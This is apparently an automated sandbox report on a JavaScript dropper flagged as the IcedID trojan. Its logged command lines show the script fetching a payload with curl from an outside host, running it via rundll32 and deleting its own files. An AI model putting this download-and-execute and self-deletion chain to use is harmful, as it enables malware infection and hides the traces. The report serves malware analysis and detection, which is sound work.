Summary | ZeroBOX

Document_Scan_231.js

UPX OS Processor Check PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 31, 2023, 10:40 a.m. Aug. 31, 2023, 10:42 a.m.
Size 31.0KB
Type ASCII text
MD5 a5fa19b8e9d308e0b423e7b3f77cb9dc
SHA256 401551e9a26596006562c8fc56b2cacc412f62cf0ac51ac84380cc0b2fef4cdf
CRC32 4A55D1F2
ssdeep 384:sjlTZHvpl9mLtnO7+WRTCaykFmoX1LgJxuv9bDgqlc3FbdZslKM+RPAQqM/pK+xH:sjdsLw1vyRXp1/yZa
Yara None matched

IP Address Status Action
104.21.64.90 Active Moloch
164.124.101.2 Active Moloch
184.168.119.55 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49175 -> 104.21.64.90:80 2032086 ET MALWARE Win32/IcedID Request Cookie A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2
192.168.56.102:49169
184.168.119.55:443
C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=avestainfratech.com df:8e:b4:c2:31:11:f0:2f:6a:95:27:bc:a4:2a:7e:67:b9:a3:6c:c7

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

bind

ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

socket: 144
backlog: 1
1 0 0

accept

ip_address:
socket: 144
port: 0
1 152 0
suspicious_features GET method with no useragent header suspicious_request GET http://oopscokir.com/
request GET http://oopscokir.com/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1392
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\velit.b.bat
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" "velit.b"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_231.js"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" "velit.b"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_231.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
cmdline cmd.exe /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_231.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" "velit.b"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\velit.b", scab /k arabika752
filepath: rundll32
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
filepath: cmd.exe
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_231.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_231.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" "velit.b"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_231.js"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\velit.b", scab /k arabika752
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" "velit.b"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_231.js"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\velit.b", scab /k arabika752
parent_process wscript.exe martian_process cmd.exe /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\velit.bnam.w" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\velit.b.bat"
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\rundll32.exe